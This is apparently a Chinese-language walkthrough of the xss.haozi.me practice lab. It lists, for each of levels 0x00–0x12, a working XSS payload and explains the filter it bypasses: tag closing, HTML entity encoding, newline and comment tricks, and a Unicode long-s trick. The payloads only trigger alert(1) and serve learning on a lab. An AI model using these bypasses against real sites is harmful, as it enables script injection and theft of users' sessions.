xss.haozi练习平台wp
前言
这里的Payload仅仅为一种思路,还有着很多其他绕过方法
练习平台
writeup
关卡 | Payload | 说明 |
---|---|---|
0x00 | <svg src=x οnlοad=alert(1)> | 没有什么过滤,直接弹框即可 |
0x01 | </textarea><svg οnlοad=“alert(1)”> | 在<textarea></textarea>标签之中的标签是不会被解析到DOM树中,所以需要先闭合/ |
0x02 | "><svg src=x οnlοad=alert(1)> | 直接闭合前面的标签即可 |
0x03 |
<svg src=x οnlοad=alert`1`> 或者 <svg src=x οnlοad=alert(1)> |
此处使用正则进行过滤,可以使用反单引号(`)来进行绕过 也可通过HTML实体编码来进行绕过 |
0x04 | <svg src=x οnlοad=alert(1)> | 此处使用HTML实体编码进行绕过 |
0x05 | –!><svg src=x οnlοad=alert(1)> | 此处使用正则对HTML注释(–>)进行过滤,但是可以使用 --!> 来将注释进行闭合 |
0x06 |
onclick =alert(1) |
此处使用正则对 on事件 进行过滤,可以通过换行来进行绕过 |
0x07 | <svg οnlοad=“alert(1)” | 此处过滤了尖括号之间的字符,不过由于浏览器的兼容性,反尖括号(>)可以省略,从而进行绕过 |
0x08 |
</style > <script>alert(1)</script> |
通过换行进行绕过,从而闭合<style>标签,进而完成弹框 |
0x09 | https://www.segmentfault.com111" οnerrοr="alert(1) | 输入正确地址,使用双引号(")将前面事件闭合即可 |
0x0A | https://www.segmentfault.com@xss.haozi.me/j.js | 使用 @ 会以 @ 前的字符串作为用户名来访问 @ 后面的网址 |
0x0B | <img src="" οnerrοr="alert(1)"> | 使用HTML实体编码进行绕过 |
0x0C | <img src="" οnerrοr="alert(1)"> | 使用HTML实体编码进行绕过 |
0x0D |
alert(1) –> |
先使用回车(换行)逃逸出注释范围,然后再使用 --> 将多余的 ') 进行注释即可 |
0x0E | <ſcript src="" οnerrοr="alert(1)"> | 脑洞题,ſ 大写后为 S(ſ 不等于s) |
0x0F | ');alert('1 | 看起来使用了HTML实体编码来防止xss,但是了解浏览器解析规则(顺序)即可知道在属性值中的HTML实体编码会被浏览器成功解析,所以此处的HTML实体编码毫无用处 |
0x10 | alert(1) | 直接输入即可 |
0x11 | ");alert("1 | 此处过滤后得到的字符其实还与原字符有着相同的作用(例如: " 被换成了 \" ,其实真正被转义的字符是第二个 \ ,而不是 "),所以此处的过滤也是毫无用处 |
0x12 | ");</script><script>alert(1)// | 与上一关卡同理,此处的过滤也是毫无用处 |
xss.haozi练习平台wp相关推荐
- xss靶场、xss.haozi.me靶场详细通关教程
文章目录 前言 预备知识 HTML编码 img的可拓展 各种payload形式 0x00 0x01 0x02 0x03(使用了正则过滤圆括号) 其它解法 0x04(使用正则过滤圆括号和反引号) 0x0 ...
- xss.haozi.me通关教程
10.xss.haozi.me通关教程 0x00 首先整体浏览网站 分别是xss注入点,注入后的HTML代码以及网页源码 构造常规payload: <script>alert(1)< ...
- xss.haozi 思路总结 0x00-0x12
xss刷题网站2 https://xss.haozi.me/ 一个非常可爱的网站.这是网站界面,题目序号是十六进制,一共19道题. 0x00 直接输入<script>alert(1)< ...
- 简单xss接收cookie平台的搭建以及xss拿cookie的一些总结
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码 提取码: tdoj 我是将 ...
- 搭建HTTPS XSS漏洞利用平台
目录 功能: 升级方式:
- IOS、Android、WP移动平台浏览器下常用字体支持度研究
做了近一年的无线项目,总觉得少了点什么,对,是总结和研究,一直在追随前人的脚步,在他人的经验中获取认知,恐怕做得越多只会觉得得过且过的感觉越深刻,最近终于有空闲的时间来做一些研究和总结了. webap ...
- php xss ctf,GitHub - qiaofei32/BlueLotus_XSSReceiver: XSS平台 CTF工具 Web安全工具
XSS数据接收平台(无SQL版) 如从旧版本升级,请务必先阅读Readme 平台说明 本平台设计理念: 简单配置即可使用,无需数据库,无需其他组件支持,可直接在php虚拟空间使用 SAE用户请切换到s ...
- xss绕过字符过滤_XSS绕过实战练习
前言 写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下.有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战 ...
- XSS表情包靶场通关记录
平台 alert(1)https://xss.haozi.me 0X00 源码无防护,直接常规payload绕过 <script>alert(1)</script> <s ...
- XSS学习-初出茅庐
XSS: 又叫跨站***,根据***类型分为以下三类: 1. 反射型 XSS -服务端没有把用户的输入数据进行标签过滤,直接在页面上输出.可能存在恶意代码的链接,诱导其他人点击进而实施***: 2. ...
最新文章
- TensorFlow 2.0开发者预览版发布
- tomcat WARNING [ContainerBackgroundProcessor[StandardEngine[Catalina]]]
- java 0x转中文_Java:转换汉字为unicode形式的字符串和转换unicode形式字符串转换成汉字...
- 2018计算机领域大事件,吕伟:2018年计算机行业回顾
- 开源方案搭建可离线的精美矢量切片地图服务-3.Mapbox个性化地图定制入门
- jQuery的概念、用法、常见面试题详解
- argb888与rgb888转换程序_一文了解各平台RGB565和RGB888区别
- java 自动启动监听_Spring Boot 启动事件和监听器,太强大了!
- Alibaba之MySQL宝典_Alibaba之MySQL宝典流出!极致经典,堪称行业天花板
- 解决java中对URL编码的问题
- chromium浏览器_轻松下载便携式Chromium浏览器
- Span 介绍及使用(一)
- 力扣-多线程专项(一)(按序打印、交替打印、打印零与奇偶数)
- 微信连wifi 电脑怎么连接到服务器,微信连wifi怎么用 微信连Wi-Fi开通使用教程-电脑教程...
- python post请求头部伪装随机(防止封ip)
- 2020安徽省大数据与人工智能网络赛题目
- Spring框架学习笔记,超详细!!(4)
- ESP32A1S开发之智能家居 语音唤醒 语音命令控制(持续更新)
- Sell变量的取用、删除、取代与替换
- 安超云生态|安超云与长城超云完成兼容互认证 携手打造协同生态